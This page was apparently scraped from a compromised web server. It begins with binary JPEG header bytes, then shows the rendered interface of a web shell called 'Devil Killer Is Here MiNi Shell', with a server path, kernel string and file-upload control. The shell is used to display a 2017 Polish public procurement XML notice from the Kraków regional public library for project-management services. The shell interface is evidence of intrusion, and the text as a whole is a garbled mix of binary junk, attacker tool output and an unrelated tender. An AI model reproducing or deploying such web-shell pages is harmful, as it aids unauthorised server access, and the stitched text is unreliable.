JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/16878_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>16878</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Wojewódzka Biblioteka Publiczna w Krakowie</nazwa><ulica>ul. Rajska</ulica><nr_domu>1</nr_domu><nr_miesz></nr_miesz><miejscowosc>Kraków</miejscowosc><kod_poczt>31124 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>małopolskie</wojewodztwo><tel>126 332 210</tel><fax></fax><email>biblioteka@wbp.krakow.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>www.rajska.info</adres_strony_url><podmiot2c></podmiot2c><regon>27815500000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu>Małopolska Biblioteka Cyfrowa w horyzoncie 21. wieku – stworzenie innowacyjnej platformy udostępniania regionalnych zasobów cyfrowych w Wojewódzkiej Bibliotece Publicznej” współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Małopolskiego na lata 2014 –2020, Oś priorytetowa: 2 Cyfrowa małopolska, Działanie: 2.1. E-administracja i otwarte zasoby, Poddziałanie: 2.1.2 Cyfrowe zasoby regionalne,</nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>inny: </rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia>T</czy_dostep_dokumentow_zamowienia><dostep_dokumentow_zamowienia>www.rajska.info</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.rajska.info</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>forma pisemna</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><oferty_lub_wnioski /><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Wojewódzka Biblioteka Publiczna, ul. Rajska 1, 31-124 Kraków, pok 202.</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Wykonanie usługi zarządzania i obsługi projektu pn.:
 Małopolska Biblioteka Cyfrowa w horyzoncie 21. wieku – stworzenie innowacyjnej platformy udostępniania regionalnych zasobów cyfrowych w Wojewódzkiej Bibliotece Publicznej w Krakowie
</nazwa_zamowienia><numer_referencyjny>SP-271-1/17</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>U</rodz_zam><przedmiot_zam>Przedmiotem zamówienia jest „Wykonanie usługi zarządzania i obsługi projektu pn.: Małopolska Biblioteka Cyfrowa w horyzoncie 21.wieku – stworzenie innowacyjnej platformy udostępniania regionalnych zasobów cyfrowych w Wojewódzkiej Bibliotece Publicznej”, współfinansowanym ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego 	w ramach Regionalnego Programu Operacyjnego Województwa Małopolskiego na lata 	2014 –2020, Oś priorytetowa: 2 Cyfrowa małopolska,  Działanie: 2.1. E-administracja i otwarte zasoby, Poddziałanie: 2.1.2 Cyfrowe zasoby regionalne.
Celem bezpośrednim projektu jest ułatwienie dostępu do regionalnych zasobów bibliotecznych dzięki nowej, innowacyjnej platformie udostępniania treści cyfrowych oraz zwiększenie dostępnego online zasobu przez wytworzenie wersji cyfrowych publikacji i upowszechnienie ich dla ochrony i popularyzacji dziedzictwa kulturowego Małopolski wśród zróżnicowanych grup odbiorców. Cel ten realizowany będzie poprzez udostępnienie 116 577 publikacji w formie cyfrowej, do których w pierwszym roku funkcjonowania produktów dostęp uzyska 600.000 odbiorców. Cyfrowa dostępność zasobów objętych projektem zwiększy się poprzez ich zamieszczenie nie tylko na nowej, powstałej w ramach projektu, innowacyjnej platformie Małopolskiej Biblioteki Cyfrowej, ale także w zasobach innych platform - Federacji Bibliotek Cyfrowych i Europeanie. 

Do obowiązków Wykonawcy należy:

I. (KOORDYNOWANIE PROJEKTU):
1)kompleksowa realizacja przedmiotu zamówienia w ścisłej zgodności z wymogami regulaminu RPO i wytycznymi dla projektu. Wykonawca zobowiązany jest do stosowania obowiązujących i aktualnych wzorów dokumentów, wytycznych Instytucji Zarządzającej oraz informacji i zaleceń zamieszczanych w szczególności na stronie internetowej Programu, a także innych dokumentów w ramach Programu oraz w ramach powszechnie obowiązującego prawa. 
2)prowadzenie Biura Projektu, w szczególności zarządzanie dokumentacją projektu  komunikacją między uczestnikami projektu, monitorowania budżetu projektu oraz harmonogramu prac. Ze względu na szczególny charakter zamówienia - Zamawiający wymaga, by Biuro Projektu miało siedzibę u Zamawiającego. Zamawiający wymaga, aby przedstawiciele Wykonawcy byli dostępni w Biurze Projektu co najmniej 2 razy w tygodniu, w godzinach pomiędzy 8.00 a 16.00, minimum 4 godziny. Zamawiający wymaga dostępności minimum telefonicznej lub e-mailowej od poniedziałku do piątku w godz. od 8.00 do 16.00. Zamawiający dopuszcza w szczególnych przypadkach, w zależności od intensywności prac oraz potrzeb projektu, zmiany zakresu dostępności w uzgodnieniu z Wykonawcą. 	Zamawiający zapewni pomieszczenie wyposażone w podstawowe sprzęty i materiały niezbędne do pracy, tj. komputer, drukarka, dostęp do internetu, materiały biurowe, szafa na dokumenty, podstawowe meble biurowe.
3)opracowanie procedur monitorowania realizacji projektu i raportowania bieżących postępów prac wykonywanych przez Wykonawców projektu we współpracy z Kierownikiem Projektu zatrudnionym przez Zamawiającego. 
4)opracowanie projektów dokumentów precyzujących niezbędne procesy decyzyjne, zgodnie z przyjętą strukturą organizacyjną projektu, w perspektywie utrzymania i rozwoju wskaźników oddziaływania i trwałości projektu po zakończeniu jego wdrażania. 
5)opracowanie szczegółowego harmonogramu realizacji projektu na bazie harmonogramu przedstawionego we wniosku aplikacyjnym. 
6)współpraca przy tworzeniu dokumentacji projektowej zgodnie z przepisami krajowymi i unijnymi, w szczególności, o których mowa w Umowie o dofinansowanie projektu nr RPMP 02.01.02-12-0042/16-00-XVII-29/FE/16 z dnia 07 grudnia 2016 r. wraz z załącznikami oraz weryfikacja dokumentacji przygotowanej przez Zamawiającego w trakcie realizacji projektu z godnie z wymogami prawa. 
7)monitorowanie realizacji projektu, nadzór nad zachowaniem jego celów i wskaźników, a także przygotowanie propozycji zmian w dokumentacji definiującej projekt, w trakcie trwania prac.
8)identyfikacja możliwych do wystąpienia zagrożeń w realizacji projektu, monitoring stopnia wystąpienia poszczególnych elementów ryzyka oraz przedstawienie propozycji środków zaradczych, informowanie Kierownika Projektu o ryzyku zagrażającym osiągnięciu celów projektu oraz udział we wdrażaniu środków zaradczych.
9)dbanie o aktualność harmonogramu rzeczowo-finansowego projektu oraz zgłaszanie ryzyk opóźnień w realizacji harmonogramu, jak również kontrolowanie zgodności przepływów finansowych zgodnie z harmonogramem.
10)przedstawianie co miesiąc, w formie protokołu, raportu wykonanych czynności prowadzanie i zatwierdzanie wszystkich danych związanych z projektem do systemu SL 2014.
11)udział i czynne wyjaśnianie ewentualnych wątpliwości w kontrolach przeprowadzanych przez instytucje uprawnione do kontroli w czasie trwania umowy i w okresie rękojmi, oraz przygotowanie materiałów i dokumentów dla potrzeb planowanych lub prowadzonych kontroli.
12)uczestnictwo w odbiorach poszczególnych zadań wchodzących w skład projektu i potwierdzanie ich protokołami odbioru częściowego i końcowego.

II. (OBSŁUGA KSIĘGOWA):
1)Przygotowanie oraz sprawdzanie dokumentów rozliczeniowych otrzymanych od wykonawców projektu pod względem merytorycznym i rachunkowym w tym:
a.okresowe przedstawienie Instytucji Zarządzającej RPO zestawienia wydatków ponoszonych przez beneficjenta w związku z realizacją projektu,
b.przygotowanie poprawnego, kompletnego i spełniającego wymogi formalne, merytoryczne i finansowe wniosku o płatność zaliczkową wraz z wymaganymi załącznikami,
c.rozliczenie płatności zaliczkowej w ciągu 30 dni od dnia otrzymania transzy dofinansowania poprzez przygotowanie wniosku o płatność wraz z wymaganymi załącznikami, 
d.przygotowanie poprawnego, kompletnego i spełniającego wymogi formalne, merytoryczne i finansowe wniosku o płatność wraz z wymaganymi załącznikami,
e. przygotowanie rozliczenia w całości kosztów kwalifikowanych wraz z wnioskiem o płatność końcową,
f.przygotowanie do dnia 15 sierpnia każdego roku kalendarzowego zapotrzebowania na środki finansowe na rok następny oraz w 2017 r. przygotowanie wniosku o środki finansowe wraz z pomocą w ewentualnym pozyskaniu środków z zewnątrz umożliwiającym zachowanie płynności finansowej Zamawiającego.
2)Weryfikacja, analiza i zatwierdzanie do zapłaty faktur wystawionych przez wykonawców projektu w związku z realizacją umowy (kontraktu).
3)Zarządzanie budżetem projektu, w tym ocena wydatków pod kątem ich kwalifikowalności. 
4)Podział kosztów pod względem typu transz („zaliczka”, „refundacja”), w uzależnieniu od źródła finansowania.
5)Współpraca z Zamawiającym w zakresie dostarczania wszystkich niezbędnych, dokumentów dotyczących rozliczeń projektu.
6)Przygotowanie wniosku o płatność w terminie określonym przez Instytucję Zarządzającą.
7)Dokonanie końcowego rozliczenia projektu z uwzględnieniem rozliczenia i przekazania Zamawiającemu środków trwałych.
8)Przygotowania wniosku o płatność końcową w terminie 30 dni od dnia zakończenia projektu.

III. (OBSŁUGA ZAMÓWIEŃ PUBLICZNYCH):
1)Kompleksowa obsługa prawna i księgowa zamówień publicznych poniżej 20 tys. zł. netto
2)Kompleksowa obsługa prawna i księgowa zamówień publicznych powyżej 20 tys. zł. netto.
3)Analiza przedmiotu zamówienia w zakresie zastosowania odpowiedniego trybu zgodnie z ustawą Prawo zamówień publicznych, z uwzględnieniem budżetu Zamawiającego. Wstępny harmonogram oraz tryb zamówień pow. 20 tys. zł netto określa tabela zamieszczona  w załączniku nr 7 do SIWZ. 	Udział w przygotowywaniu opisów przedmiotu zamówienia, przygotowanie od strony prawnej i księgowej dokumentacji przetargowej lub 	dokumentacji w innym wymaganym trybie dla postępowań o udzielenie zamówienia publicznego powyżej i poniżej 20 tys. zł netto, ścisła współpraca z Zamawiającym przy tworzeniu przez niego OPZ.
4)Udzielanie odpowiedzi na pytania zadane w trakcie postępowań o udzielenie zamówienia publicznego w zakresie dotyczącym dokumentacji przetargowej.
5)Analiza ofert pod kątem spełnienia przez Wykonawców warunków wymaganych przez zamawiającego w dokumentacji przetargowej (w tym SIWZ) oraz przygotowanie i prowadzenie korespondencji z Wykonawcami, w tym zarekomendowanie Zamawiającemu wyboru jednego z Wykonawców, udział w komisji przetargowej.
6)Przygotowywanie wszelkich pism i innych dokumentów związanych z przeprowadzanymi postępowaniami o udzielenie zamówień publicznych wymaganych przez obowiązujące przepisy.
7)Przygotowywanie opinii dotyczących kwestii związanych z udzielaniem zamówień publicznych w projekcie, na polecenie Kierownika Projektu.
8)Przygotowywanie odpowiedzi na odwołania, skargi.
9)Zamawiający wymaga od Wykonawcy reprezentacji przed KIO,sądami powszechnymi,innymi instytucjami oraz współpracy i doradztwa w sytuacji,gdy Zamawiający będzie,samodzielnie występował przed powyższymi jednostkami w postępowaniach związanych z realizacją przedmiotu zamówienia. 
10)Wykonawca jest zobowiązany  do niezwłocznego zawiadamiania Zamawiającego o wszystkich nieprzewidzianych usługach/dostawach dodatkowych,zamiennych lub uzupełniających,potrzebnych do wykonania projektu oraz przygotowanie i przeprowadzenie - na polecenie Zamawiającego - postępowania w tym zakresie.
</przedmiot_zam><cpv1c>79421000-1</cpv1c><cpv2c>79421100-2</cpv2c><okres2c>30/09/2019</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc>PLN</waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow></informacje_na_temat_katalogow><okreslenie_warunkow>Zamawiający nie opisuje i nie wyznacza szczegółowego warunku w tym zakresie Wykonawca przedkłada w tym zakresie Oświadczenie, którego przykładowy wzór stanowi załącznik nr 3 do SIWZ.
Wymagania takie nie wynikają również z odrębnych przepisów.   </okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Zamawiający wymaga, aby Wykonawca wykazał, iż jest ubezpieczony od 	odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 100.000,00 zł  (słownie: sto tysięcy złotych).</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Zamawiający wymaga by wykonawcy:
1.w okresie ostatnich 3 lat przed upływem terminu składania ofert,a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali lub wykonują należycie co najmniej:
1) jedno (1) zamówienie, które  obejmowało/uje swoim zakresem:
a. jedną usługę doradczą o wartości minimum 200 000,00 PLN brutto obejmującą wsparcie w zakresie organizacji i zarządzania projektem, którego jednym z zadań była budowa systemu informatycznego dla instytucji publicznej, o budżecie tego projektu powyżej 10 000 000,00 PLN brutto,
b.jedną usługę polegającą na rozliczeniu projektu finansowanego/współfinansowanego ze środków europejskich zgodnie z przepisami prawa polskiego i unijnego, dokumentami programowymi oraz wytycznymi i regułami obowiązującymi beneficjentów funduszy 	europejskich o budżecie nie mniejszym niż 10 000 000,00 PLN brutto. 
c.usługi polegające na doradztwie prawnym przy przygotowywaniu i przeprowadzaniu co najmniej trzech postępowań o udzielenie zamówienia publicznego zakończonych zawarciem umowy, przy czym szacunkowa wartość każdego z tych postępowań była 	wyższa niż wartość określona w art. 11 ust. 8 ustawy Pzp.
2) dwie (2) usługi pomocy prawnej polegające na sporządzeniu opinii prawnych,i udzielaniu porad prawnych, z których każda była świadczona w zakresie realizacji odrębnego zamówienia,którego przedmiotem były usługi lub dostawy informatyczne; przy przy czym łączna wartość zamówień informatycznych nie może być mniejsza, niż 5.000 000,00 PLN brutto.
W celu potwierdzenia spełnienia warunku Wykonawca zobowiązany jest załączyć dokument potwierdzający, że usługi zostały wykonane lub są wykonywane należycie (np. referencje) oraz podać dane teleadresowe do firmy/instytucji, która wystawiła dokument, w celu umożliwienia Zamawiającemu dokonania weryfikacji podanych informacji.  
Uwaga:
Wyżej wymienione usługi mogą być wykonane w ramach jednego lub odrębnych zamówień. W przypadku wykazania wymienionych wyżej usług w jednym lub kilku zamówieniach wykonawca musi określić w wykazie wykonanych usług wartość brutto wymienionych wyżej usług (osobno wartość każdej usługi).

2. Wykonawca zobowiązany jest wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia o kwalifikacjach zawodowych, uprawnieniach, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia, odpowiadającym warunkom określonym poniżej:
Koordynator projektu: - wykształcenie wyższe;
-posiada certyfikat z metodyki zarządzania projektami Prince2 Practitioner lub Project Management Professional (PMP) lub równoważny
- w ciągu ostatnich 5 lat przed dniem składania ofert pełnił funkcję Koordynatora Projektu (Kierownika Projektu) w co najmniej jednym zakończonym i zrealizowanym  prawidłowo projekcie finansowanym z środków europejskich o budżecie nie mniejszym niż 10 000 000,00 PLN brutto, trwającym minimum 12 miesięcy
Ekspert ds. rozliczeń: - wykształcenie wyższe;
- posiada znajomość przepisów w zakresie obsługi środków pomocowych UE, aspektów finansowo – księgowych w zarządzaniu projektami, 
- posiada doświadczenie w zakresie rozliczania co najmniej 2 projektów współfinansowanych ze środków europejskich, o wartości każdego projektu co najmniej 10 000 000,00 PLN,
- brał udział w realizacji co najmniej dwóch projektów współfinansowanych ze środków europejskich, o wartości każdego projektu co najmniej 10 000 000,00 PLN,  trwających każdy minimum 12 miesięcy, w których odpowiedzialny był za prowadzenie harmonogramów rzeczowo-finansowych, ocenę kwalifikowalności wydatków i sporządzanie wniosków o płatność
Ekspert ds. zamówień publicznych:- wykształcenie wyższe;
- uprawnienia radcy prawnego lub adwokata;
- posiada doświadczenie w zakresie przygotowania i przeprowadzenia co najmniej dwóch postępowań o zamówienie publiczne, przy czym każde było o szacunkowej wartości zamówienia powyżej kwoty określonej w art. 11 ust. 8 ustawy Pzp i przynajmniej jedno z nich było na dostawy lub usługi informatyczne. 
Zamawiający zastrzega, że Koordynator Projektu może pełnić jednocześnie rolę Eksperta ds. rozliczeń lub Eksperta ds. zamówień publicznych. Funkcji Eksperta ds. rozliczeń i Eksperta ds. zamówień publicznych nie można łączyć.



</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe>1.Zamawiający nie wprowadza zastrzeżenia, o którym mowa w art. 22 ust. 2 ustawy Pzp. 
2.Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.
3.W przypadku wspólnego ubiegania się o zamówienie na zasadach określonych w art. 23 PZP wykonawcy muszą łącznie wykazać spełnienie warunków uczestnictwa, o których mowa w rozdział VII, pkt 1., 2),2.2 oraz rozdział VII, pkt 1., 2), 2.3. - SIWZ
4.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w 	stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub 	ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim 	stosunków prawnych.
5.Zamawiający oceni,czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz bada,czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 12–23 ustawy.
6.W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub 	doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.</zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>N</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1 /><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>1.W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu należy przedłożyć wraz z ofertą oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz nie podleganiu wykluczeniu wg treści określonej w załączniku nr 3 do SIWZ.
2.Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie,w jakim powołuje się 	na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt. 1. Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom w celu wykazania braku istnienia wobec nich podstaw wykluczenia zamieszcza informacje o tych podmiotach w 	oświadczeniu, o którym mowa w pkt.1.
3.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym mowa w punkcie 1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. 
4. informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 	14 i 21 ustawy; 
5. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące 	przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł 	porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
